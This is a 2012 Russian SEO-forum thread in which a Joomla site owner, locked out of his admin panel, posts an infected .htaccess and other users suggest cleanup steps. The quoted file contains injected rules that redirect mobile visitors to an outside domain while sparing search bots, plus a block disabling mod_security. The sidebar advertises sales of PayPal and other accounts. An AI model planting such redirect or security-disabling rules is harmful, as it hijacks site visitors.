Войти

Войти | Регистрация
Поиск по сайту
Не могу зайти в админку сайта. Вирус?
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Не могу зайти в админку сайта. Вирус?
#1
9 Апреля 2012 12:37
Здравствуйте!  Сайт джумла 1.5 Перестал пускать в админку сайта. После введения правильного (и даже неправильного) пароля идет обновление страницы без какого-либо сообщения. 
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало. 
Плагины авторизации и com_uzers включены (везде стоит 1). Может отключены куки? Но я не знаю где это смотреть (буду благодарен, если подскажите). 

А сегодня зашел в файл .htaccess и увидел там такое (выделенным цветом). 

Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить? :


RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://сайт.ru/ [L,R=302]
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright © 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On


########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
<IfModule mod_security.c> 
# Disable mod_security 
SecFilterEngine Off 
</IfModule>






Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить?
Изменено: Андрюха - 9 Апреля 2012 12:43
#2
9 Апреля 2012 19:41
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
#3
10 Апреля 2012 13:01
Цитата
Yapy пишет:
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
Не-нет )) Я поменял в БД пароль администратора в плагине юзеров. Но там дело не в пароле. Потому-что страница авторизации на правильный и неправильный пароль не реагирует вообще никак. И зарегистрироваться на сайте тоже нельзя. Такое впечатление что отключены плагины авторизации и регистрации. Но я смотрел в БД - они все включены. 
А что Вы думаете насчет того кода в файле  .htaccess. Могло ли это повлиять? 
#4
10 Апреля 2012 13:32
Ну я б на вашем месте

1) дернул дернул бы только базу и папку images.

2) И на локал хосте собрал  бы новый сайт со всеми компонетнеами и модулями, что у вас сейчас стоят на сайте,  и импотнул бы старую базу, предварительно протестив ее антивирем

Ибо по ходу  Ваш сайт  не только ломанули но и понавнедряли всякую бяку + код попортили
#5
21 Мая 2012 14:04
Проверяй все файлы с расширением js.
Сам недавно чистил эту заразу. 
Проще всего все содержимое сайта скопируй в какую нибудь папку к себе на комп и напусти на нее kasperskiy removal tool.
Она эту дрянь видит но не лечит. Далее либо зараженные файлы js восстанавливать из бэкапа (мой случай) либо вручную править зараженные файлы.
Зараза свой код дописывает в конце. Но это муторно -  у меня было заражено штук по 150 на каждом сайте.
#6
22 Мая 2012 06:59
Гы, у меня такое на ВП было))) Пол дня голову ламал, потом админам (хостинга) тикет написал и спать пошел. С утра все было зашибись)))
 
Страницы: 1
Похожие темы:
  24.02.2015 16:53  Не могу избавиться от "вируса"
  07.05.2013 16:32  Не могу заблокировать чужой IP, почему-то блокируется мой собственный.
  20.04.2013 14:04  Помогите. Не могу удалить Fishing файлы в корневой папке Wordpress
  08.10.2012 14:48  не могу зайти на сайт
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:29 Как продвигать сайт с неуникальным контентом 
13:54 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
17:01 Absence в Армении 
23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 
21:07 SOCKS5 приватные прокси на 30 дней для PayPal 
21:06 Google Voice аккаунты для бесплатных SMS и звонков 
21:06 PayPal аккаунты для любых целей 
17:16 Продажа аккаунтов HH.RU 
15:45 Продам профи аккаунт Kwork 
15:14 Coindrop.trade - обменник электронных валют 
14:04 AVTtool — программа для накрутки поведенческих факторов на Avito 
22:06 Добро пожаловать в цифровой мир... 
20:20 Роскомнадзор стал инструментом шантажа и заработка в России? 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (596 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2025 (101 день назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Ютуб - продвижение и заработок
—  Новая акция 2025: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок
—  Как лить трафик на беттинг под крикет: 4 шага к профиту


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050